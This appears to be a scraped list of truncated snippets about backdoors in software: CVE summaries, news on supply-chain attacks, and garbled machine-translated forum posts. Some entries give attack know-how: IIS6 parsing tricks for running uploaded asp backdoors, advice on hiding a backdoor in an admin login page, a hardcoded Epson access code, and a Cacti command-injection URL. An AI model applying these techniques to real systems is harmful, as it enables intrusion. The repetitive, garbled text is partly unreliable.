CVE-2022-34053

The DR-Web-Engine package in PyPI v0.2.0b0 was discovered to contain a code execution backdoor via the request package. This vulnerability allows attackers to access sensitive user information and digital currency keys, as well as escalate privileges...

CVE-2019-10842

Arbitrary code execution via backdoor code was discovered in bootstrap-sass 3.2.0.3, when downloaded from rubygems.org. An unauthenticated attacker can craft the cfduid cookie value with base64 arbitrary code to be executed via eval, which can be leveraged to execute arbitrary code on the target...

CVE-2019-10842

CVE-2019-10842 describes an arbitrary code execution backdoor in bootstrap-sass 3.2.0.3 when downloaded from rubygems.org. An unauthenticated attacker can craft the ___cfduid cookie value with base64-encoded code to be executed via eval(), enabling remote code execution on the target system. The ...

ASUS Patches Live Update Bug That Allowed APT to Infect Thousands of PCs

ASUS has expedited a patch for a major bug impacting thousands of PCs that allowed an advanced persistent threat group to launch a supply-chain attack dubbed “Operation ShadowHammer.” The vulnerability targeted a range of new ASUS PCs with a backdoor injection technique tied to the PC-maker’s...

CVE-2017-12860

The Epson "EasyMP" software is designed to remotely stream a users computer to supporting projectors.These devices are authenticated using a unique 4-digit code, displayed on-screen - ensuring only those who can view it are streaming.In addition to the password, each projector has a hardcoded...

CVE-2017-12860

The Epson "EasyMP" software is designed to remotely stream a users computer to supporting projectors.These devices are authenticated using a unique 4-digit code, displayed on-screen - ensuring only those who can view it are streaming.In addition to the password, each projector has a hardcoded...

Hardcoded credentials

The Epson "EasyMP" software is designed to remotely stream a users computer to supporting projectors.These devices are authenticated using a unique 4-digit code, displayed on-screen - ensuring only those who can view it are streaming.In addition to the password, each projector has a hardcoded...

CVE-2017-12860

The Epson "EasyMP" software is designed to remotely stream a users computer to supporting projectors.These devices are authenticated using a unique 4-digit code, displayed on-screen - ensuring only those who can view it are streaming.In addition to the password, each projector has a hardcoded...

CVE-2017-12860

CVE-2017-12860 affects Epson EasyMP software used to remotely stream a user’s computer to projectors. The vulnerability stems from a hardcoded backdoor code (2270) that authenticates to all devices, in addition to the on-screen 4‑digit access code. Reported details indicate a network-accessible i...

CVE-2017-12860

The Epson "EasyMP" software is designed to remotely stream a users computer to supporting projectors.These devices are authenticated using a unique 4-digit code, displayed on-screen - ensuring only those who can view it are streaming.In addition to the password, each projector has a hardcoded...

Popular remote terminal management tool Xshell is implanted in the back door code, could lead to sensitive information disclosure-vulnerability warning-the black bar safety net

Recently, a very popular remote terminal Xshell is found to be implanted back door code, if the user using the Troy of the Xshell tool version may lead to sensitive information being leaked to the attacker the control of the machine. Xshell particular Build 1322 on the domestic use of the surface...

CVE-2016-8856

Foxit Reader for Mac 2.1.0.0804 and earlier and Foxit Reader for Linux 2.1.0.0805 and earlier suffered from a vulnerability where weak file permissions could be exploited by attackers to execute arbitrary code. After the installation, Foxit Reader's core files were world-writable by default,...

PNG Image Metadata Found Leveraging iFrame Injections

Researchers have discovered a relatively new way to distribute malware that relies on reading JavaScript code stored in an obfuscated PNG file’s metadata to trigger iFrame injections. The technique makes it highly unlikely a virus scanner would catch it because the injection method is so deeply...

NIST Reviews Crypto Standards Development

The National Institute for Standards and Technology has taken an important step toward repairing what the National Security Agency has allegedly fractured by initiating a review of its cryptographic standards development processes. NIST-sponsored algorithms are at the heart of numerous crypto...

Common server to resolve the vulnerability summary-vulnerability warning-the black bar safety net

Author : laterain +IIS6. 0 Directory resolution:/xx.asp/xx.jpg xx.jpg can be replaced with any text filee.g. xx.txt, the text content for the back door code IIS6. 0 will be xx.jpg parsing of asp files. Suffix resolution:/xx. asp;. jpg IIS6. 0 would put such a suffix the file is successfully parse...

HDwiki各版本新漏洞补丁包2012-08-09发现后门代码

简要描述： HDwiki各版本新漏洞补丁包2012-08-09发现后门代码 详细说明： 在看补丁包中的 reference.php 文件时， 首行并发现了如下不明之处： base & $get,& $post; $this-load"reference"; requireoncedirnameFILE."/../js/jqeditor/hdwiki.js"; // 就是这里， 好端端的PHP。include js文件干什么 然后就看了一下补丁包中的 hdwiki.js 终于明白官方的用心了 hdwiki.js function delSave...

UnrealIRCd IRC server multiple security vulnerabilities

Buffer overflow, backdoor code...

The most hidden of the asp Backdoor-vulnerability warning-the black bar safety net

| Today that is in the administrator backend login screen hidden our back door, which is relatively safe, because the administrator of the inlet is not Often change, as long as his login screen on our back door just in! 1. From our SHELL found on the administrator portal page 2. Edit it in the...

Not dead shellcode-exploit warning-the black bar safety net

HEE HEE,today the computer some of the things transferred to the mobile hard disk,find yourself previously voted over the few manuscript,crude see an article but there are a few articles or a little heat,simply submit to the evil eight,hope can be a friend in need some help...rookie write the dis...

Cacti 0.8.6d - Remote Command Execution

Note: This exploit contains backdoor shell code that is not located on this server. /str0ke !/usr/bin/perl Remote Command Execution Exploit for Cacti http://www.example.com/cacti/graphimage.php?localgraphid=validvalue&graphstart=%0acommand%0a Patch: download the last version...